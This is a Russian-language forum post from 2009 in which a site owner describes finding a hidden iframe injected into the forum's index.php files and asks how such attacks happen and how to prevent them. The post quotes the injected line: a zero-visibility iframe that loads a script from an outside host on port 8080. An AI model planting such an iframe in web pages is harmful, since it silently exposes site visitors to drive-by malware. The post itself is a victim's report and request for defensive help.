Сегодня утром захожу на свой форум... И вижу белое окно браузера.  
 
В недоумении заглядываю на фтп и слышу голос аваста: "Внимание обнаружен вирус!". Смотрю на список файлов и действительно файл "index.php" недавно был модифицирован, открываю его в редакторе и вижу последняя часть его кода варварски удалена (с 281 по 296 строку), а за место нее стоит ненавистный iframe  тег,  такого типа: 
CODE: 
iframe src="http://f5l.at:8080/ts/in.cgi?pepsi154" width=125 height=125 style="visibility: hidden"></iframe>
  . Удалил. А потом обнаружил, что это содержание внедрено практически во все "индекс" файлы форума. Пришлось чистить. 
 
Кто может подсказать как бороться с такими атаками? Как их предотвратить? И как они вообще возможны? Как был получен доступ на запись к индекс файлам?(Отредактировано автором: 21 августа 2009 — 12:06)  |